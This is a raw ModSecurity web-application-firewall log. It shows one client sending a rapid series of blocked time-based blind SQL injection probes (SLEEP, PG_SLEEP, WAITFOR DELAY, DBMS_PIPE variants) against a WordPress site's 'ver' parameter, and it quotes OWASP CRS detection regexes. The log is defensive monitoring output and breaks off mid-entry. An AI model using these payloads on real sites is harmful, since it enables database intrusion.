[unique_id "ZsGMrkusHEVNaz1QkYN6WgAAANA"] [Sun Aug 18 00:54:54.686867 2024] [:error] [pid 26175:tid 140111001896704] [client 92.51.2.78:60728] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: );SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMrkusHEVNaz1QkYN6WwAAAM4"] [Sun Aug 18 00:54:54.917706 2024] [:error] [pid 26175:tid 140111018682112] [client 92.51.2.78:60730] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: ;SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMrkusHEVNaz1QkYN6XAAAAMw"] [Sun Aug 18 00:54:55.045288 2024] [:error] [pid 26175:tid 140111043860224] [client 92.51.2.78:60732] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: ');SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMr0usHEVNaz1QkYN6XQAAAMk"] [Sun Aug 18 00:54:55.257973 2024] [:error] [pid 25549:tid 140111001896704] [client 92.51.2.78:60734] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: ';SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMr5VyS4wZaDPTA77mOgAAAA4"] [Sun Aug 18 00:54:55.489283 2024] [:error] [pid 25550:tid 140110934755072] [client 92.51.2.78:60736] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: %';SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMr_n89YewL24c7_QPvQAAAFY"] [Sun Aug 18 00:54:55.906280 2024] [:error] [pid 26175:tid 140110968325888] [client 92.51.2.78:60738] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: );SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMr0usHEVNaz1QkYN6XgAAANI"] [Sun Aug 18 00:54:56.029666 2024] [:error] [pid 26175:tid 140110926362368] [client 92.51.2.78:60740] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: ;SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMsEusHEVNaz1QkYN6XwAAANc"] [Sun Aug 18 00:54:56.160403 2024] [:error] [pid 25550:tid 140111010289408] [client 92.51.2.78:60742] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: ');SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMsPn89YewL24c7_QPvgAAAE0"] [Sun Aug 18 00:54:56.337218 2024] [:error] [pid 26175:tid 140110917969664] [client 92.51.2.78:60744] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: ';SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMsEusHEVNaz1QkYN6YAAAANg"] [Sun Aug 18 00:54:56.898383 2024] [:error] [pid 26175:tid 140111027074816] [client 92.51.2.78:60746] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: %';SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMsEusHEVNaz1QkYN6YQAAAMs"] [Sun Aug 18 00:54:57.201614 2024] [:error] [pid 25551:tid 140111018682112] [client 92.51.2.78:60748] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: );WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMsSSCXpUXSc3dPnIU8wAAAIw"] [Sun Aug 18 00:54:57.540537 2024] [:error] [pid 25551:tid 140111069038336] [client 92.51.2.78:60750] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: ;WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMsSSCXpUXSc3dPnIU9AAAAIY"] [Sun Aug 18 00:54:57.675210 2024] [:error] [pid 26175:tid 140111010289408] [client 92.51.2.78:60754] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: ');WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMsUusHEVNaz1QkYN6YwAAAM0"] [Sun Aug 18 00:54:57.911473 2024] [:error] [pid 25550:tid 140110951540480] [client 92.51.2.78:60756] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: ';WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMsfn89YewL24c7_QPvwAAAFQ"] [Sun Aug 18 00:54:58.149393 2024] [:error] [pid 25551:tid 140111052252928] [client 92.51.2.78:60760] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: %';WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMsiSCXpUXSc3dPnIU9QAAAIg"] [Sun Aug 18 00:54:58.569490 2024] [:error] [pid 26175:tid 140111174412032] [client 92.51.2.78:60764] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: );SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(67)||CHR(118)||CHR(82),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMskusHEVNaz1QkYN6ZAAAAMI"] [Sun Aug 18 00:54:58.698690 2024] [:error] [pid 25550:tid 140110968325888] [client 92.51.2.78:60766] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: ;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(67)||CHR(118)||CHR(82),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMsvn89YewL24c7_QPwQAAAFI"] [Sun Aug 18 00:54:58.824288 2024] [:error] [pid 25551:tid 140110993504000] [client 92.51.2.78:60768] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: ');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(67)||CHR(118)||CHR(82),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMsiSCXpUXSc3dPnIU9wAAAI8"] [Sun Aug 18 00:54:59.041676 2024] [:error] [pid 25549:tid 140110943147776] [client 92.51.2.78:60770] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: ';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(67)||CHR(118)||CHR(82),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMs5VyS4wZaDPTA77mOwAAABU"] [Sun Aug 18 00:54:59.289989 2024] [:error] [pid 25549:tid 140111174412032] [client 92.51.2.78:60772] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: %';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(67)||CHR(118)||CHR(82),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMs5VyS4wZaDPTA77mPAAAAAI"] [Sun Aug 18 00:54:59.757044 2024] [:error] [pid 25549:tid 140111085823744] [client 92.51.2.78:60774] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: ) AND SLEEP(5) AND (7845=7845"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMs5VyS4wZaDPTA77mPQAAAAQ"] [Sun Aug 18 00:54:59.960121 2024] [:error] [pid 25549:tid 140111035467520] [client 92.51.2.78:60776] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: AND SLEEP(5)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag 